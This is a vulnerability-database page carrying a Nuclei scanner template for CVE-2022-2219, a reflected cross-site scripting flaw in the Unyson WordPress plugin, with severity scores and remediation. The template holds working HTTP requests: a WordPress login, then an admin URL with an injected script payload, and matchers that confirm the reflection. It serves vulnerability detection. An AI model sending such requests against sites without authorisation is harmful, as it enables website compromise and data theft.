Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-2219
HistoryApr 21, 2023 - 8:56 a.m.

Unyson < 2.7.27 - Cross Site Scripting

2023-04-2108:56:01
ProjectDiscovery
github.com
3
cve
cross site scripting
reflected
unauthorized access
data theft
website compromise
wordpress
plugin
vulnerability
wpscan
brizy
security

7.2 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

0.002 Low

EPSS

Percentile

52.6%

The plugin does not sanitise and escape the QUERY_STRING before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting in browsers which do not encode characters
id: CVE-2022-2219

info:
  name: Unyson < 2.7.27 - Cross Site Scripting
  author: r3Y3r53
  severity: high
  description: |
    The plugin does not sanitise and escape the QUERY_STRING before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting in browsers which do not encode characters
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access, data theft, and potential compromise of the affected website.
  remediation: Fixed in version 2.7.27
  reference:
    - https://wpscan.com/vulnerability/1240797c-7f45-4c36-83f0-501c544ce76a
    - https://nvd.nist.gov/vuln/detail/CVE-2022-2219
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cve-id: CVE-2022-2219
    cwe-id: CWE-79
    epss-score: 0.00159
    epss-percentile: 0.52368
    cpe: cpe:2.3:a:brizy:unyson:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: brizy
    product: unyson
    framework: wordpress
  tags: cve,cve2022,authenticated,wordpress,wp,xss,unyson,wp-plugin,wpscan,brizy

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/admin.php?page=fw-extensions&sub-page=extension&extension=feedback<script>alert(document.domain)</script>  HTTP/1.1
        Host: {{Hostname}}

    redirects: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(header_2, "text/html")'
          - 'contains(body_2, "script%3Ealert%28document.domain%29%3C%2Fscript%3")'
          - 'contains(body_2, "Unyson")'
        condition: and
# digest: 480a00453043022041546fe9ebba3167a2fe2e7869c441debee654be5df8fbccd8b9ea9403baf526021f122c80a7715ae83f0545a992eaf725f91c015857f39e958823d47ce681f90e:922c64590222798bb761d5b6d8e72950

7.2 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

0.002 Low

EPSS

Percentile

52.6%